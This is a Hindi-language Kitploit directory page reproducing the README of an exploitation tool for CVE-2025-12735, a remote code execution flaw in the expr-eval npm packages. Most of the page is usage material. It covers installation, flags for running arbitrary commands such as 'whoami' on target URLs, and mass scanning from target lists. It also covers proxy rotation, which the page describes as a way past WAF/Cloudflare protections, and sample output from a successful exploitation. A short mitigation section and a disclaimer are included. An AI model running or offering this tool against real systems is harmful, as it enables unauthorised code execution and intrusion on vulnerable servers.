Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-12735-expr-eval-rce — CVE-2025-12735 (expr-eval RCE vulnerability) का पता लगाने और परीक्षण करने के लिए सुरक्षा अनुसंधान उपकरण | Kitploit
उपकरण/GitHubGitHub/an5i/cve-2025-12735-expr-eval-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHuban5i/cve-2025-12735-expr-eval-rce

cve-2025-12735-expr-eval-rce

CVE-2025-12735 (expr-eval RCE vulnerability) का पता लगाने और परीक्षण करने के लिए सुरक्षा अनुसंधान उपकरण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
119 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-12735 expr-eval RCE शोषण उपकरण

expr-eval और expr-eval-fork npm पैकेजों में CVE-2025-12735 भेद्यता का पता लगाने और परीक्षण करने के लिए एक सुरक्षा अनुसंधान उपकरण।

⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। इस उपकरण का उपयोग केवल उन सिस्टमों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

📋 अवलोकन

CVE-2025-12735 expr-eval और expr-eval-fork npm पैकेजों में एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है। यह भेद्यता हमलावरों को पार्सर द्वारा उपयोग किए जाने वाले context ऑब्जेक्ट के अंदर मनमाने फ़ंक्शन परिभाषित करने की अनुमति देती है, जिससे सिस्टम-स्तरीय कमांड निष्पादित करने वाले दुर्भावनापूर्ण कोड का इंजेक्शन संभव होता है।

CVSS स्कोर: 9.8 (गंभीर)
प्रभावित संस्करण: expr-eval-fork < 3.0.0
फिक्स्ड संस्करण: expr-eval-fork v3.0.0+

🔍 विशेषताएं

  • स्वचालित पहचान: जावास्क्रिप्ट फ़ाइलों में expr-eval लाइब्रेरी के उपयोग की स्कैन करता है
  • एंडपॉइंट खोज: स्वचालित रूप से मूल्यांकन एंडपॉइंट ढूंढता है
  • भेद्यता परीक्षण: CVE-2025-12735 भेद्यता के लिए परीक्षण करता है
  • कमांड निष्पादन: RCE क्षमता प्रदर्शित करता है (अधिकृत परीक्षण के लिए)
  • मल्टी-थ्रेडिंग समर्थन: समानांतर में कई लक्ष्यों को स्कैन करें
  • प्रॉक्सी समर्थन: WAF/Cloudflare प्रतिबंधों को बायपास करें
  • JSON निर्यात: JSON प्रारूप में विस्तृत परिणाम

📦 स्थापना

पूर्वापेक्षाएँ

  • Python 3.6 या उच्चतर
  • pip (पायथन पैकेज मैनेजर)

त्वरित स्थापना

root@kitploit:~
# रिपॉजिटरी को क्लोन करें
git clone https://github.com/AN5I/cve-2025-12735-expr-eval-rce.git
cd cve-2025-12735-expr-eval-rce

# निर्भरताएँ स्थापित करें
pip install -r requirements.txt

# स्क्रिप्ट को निष्पादन योग्य बनाएं (वैकल्पिक)
chmod +x uknf_cve_2025_12735_expr_eval_rce.py

वैकल्पिक: प्रत्यक्ष डाउनलोड

root@kitploit:~
# स्क्रिप्ट डाउनलोड करें
wget https://raw.githubusercontent.com/AN5I/cve-2025-12735-expr-eval-rce/main/uknf_cve_2025_12735_expr_eval_rce.py

# निर्भरताएँ स्थापित करें
pip install requests

🚀 उपयोग

मूल उपयोग

root@kitploit:~
# एकल लक्ष्य
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com

# कस्टम कमांड निष्पादित करें
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -c "whoami"

# फ़ाइल से अनेक लक्ष्य
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

# तेज़ स्कैनिंग के लिए थ्रेडिंग के साथ
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -t 5

# डीबगिंग के लिए वर्बोज़ आउटपुट
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com -v

प्रॉक्सी का उपयोग

root@kitploit:~
# एकल प्रॉक्सी
python3 uknf_cve_2025_12735_expr_eval_rce.py -u http://target.com --proxy http://proxy:port

# फ़ाइल से अनेक प्रॉक्सी
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

कमांड लाइन विकल्प

root@kitploit:~
-u, --url          लक्ष्य URL
-f, --file         लक्ष्य URL वाली फ़ाइल (प्रति पंक्ति एक)
-c, --command      निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)
-t, --threads      थ्रेड्स की संख्या (डिफ़ॉल्ट: 1)
-o, --output       आउटपुट फ़ाइल (डिफ़ॉल्ट: uknf_expr_eval_results.json)
-v, --verbose      वर्बोज़ लॉगिंग सक्षम करें
--proxy            प्रॉक्सी URL (जैसे, http://127.0.0.1:8080)
--proxy-list       प्रॉक्सी URL वाली फ़ाइल (प्रति पंक्ति एक)

📊 आउटपुट

स्क्रिप्ट विस्तृत परिणामों के साथ एक JSON फ़ाइल उत्पन्न करती है:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:35:32.638109",
  "expr_eval_detected": true,
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/api/evaluate"
}

🔬 यह कैसे काम करता है

  1. पहचान चरण: जावास्क्रिप्ट फ़ाइलों और HTML सामग्री में expr-eval संदर्भों की स्कैन करता है
  2. एंडपॉइंट खोज: सामान्य API एंडपॉइंट का परीक्षण करता है जो expr-eval का उपयोग कर सकते हैं
  3. भेद्यता परीक्षण: कॉन्टेक्स्ट ऑब्जेक्ट में मनमाने फ़ंक्शन इंजेक्ट करने का प्रयास करता है
  4. शोषण: यदि संवेदनशील है, तो RCE क्षमता प्रदर्शित करता है

🛡️ शमन

यदि आप expr-eval या expr-eval-fork का उपयोग कर रहे हैं:

  1. तुरंत अपग्रेड करें:

    root@kitploit:~
    npm install expr-eval-fork@latest
    
  2. सुरक्षा पैच लागू करें:

    • expr-eval पर पुल रिक्वेस्ट #288 लागू करें
    • या expr-eval-fork v3.0.0+ पर स्विच करें
  3. इनपुट सत्यापन लागू करें:

    • सभी उपयोगकर्ता इनपुट को सैनिटाइज़ करें
    • फ़ंक्शन व्हाइटलिस्टिंग का उपयोग करें
    • कॉन्टेक्स्ट ऑब्जेक्ट को सत्यापित करें

📚 संदर्भ

  • CVE: CVE-2025-12735
  • CERT: VU#263614
  • GitHub Advisory: GHSA-jc85-fpwf-qm7x
  • सुरक्षा पैच: PR #288

📖 उदाहरण

उदाहरण 1: एकल लक्ष्य स्कैन

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com

उदाहरण 2: आउटपुट के साथ अनेक लक्ष्य

root@kitploit:~
# लक्ष्य फ़ाइल बनाएं
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# स्कैन चलाएं
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt -o results.json

उदाहरण 3: कस्टम कमांड निष्पादन

root@kitploit:~
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com -c "uname -a"

उदाहरण 4: प्रॉक्सी का उपयोग

root@kitploit:~
# एकल प्रॉक्सी
python3 uknf_cve_2025_12735_expr_eval_rce.py -u https://example.com --proxy http://127.0.0.1:8080

# फ़ाइल से अनेक प्रॉक्सी
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 uknf_cve_2025_12735_expr_eval_rce.py -f targets.txt --proxy-list proxies.txt

🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।

  1. रिपॉजिटरी को फोर्क करें
  2. अपनी फीचर ब्रांच बनाएं (git checkout -b feature/AmazingFeature)
  3. अपने परिवर्तन कमिट करें (git commit -m 'Add some AmazingFeature')
  4. ब्रांच पर पुश करें (git push origin feature/AmazingFeature)
  5. पुल रिक्वेस्ट खोलें

🐛 मुद्दे

यदि आपको कोई समस्या आती है या सुझाव हैं, तो कृपया GitHub पर एक मुद्दा खोलें।

📝 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

⭐ स्टार इतिहास

यदि आपको यह उपकरण उपयोगी लगे, तो कृपया इसे GitHub पर स्टार देने पर विचार करें!

⚖️ कानूनी

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इस प्रोग्राम के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं हैं। उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि किसी भी सिस्टम का परीक्षण करने से पहले उनके पास उचित प्राधिकरण है।

🙏 आभार

  • मूल भेद्यता रिपोर्टर: Jangwoo Choe (UKO)
  • भेद्यता प्रकटीकरण के लिए CERT समन्वय केंद्र
  • सुरक्षा सलाहकारों के लिए GitHub Security और npm

💰 दान

यदि आपको यह उपकरण उपयोगी लगता है और आप परियोजना का समर्थन करना चाहते हैं:

बिटकॉइन (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

एथेरियम (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

आपके समर्थन के लिए धन्यवाद! 🙏

टूल डाउनलोड करें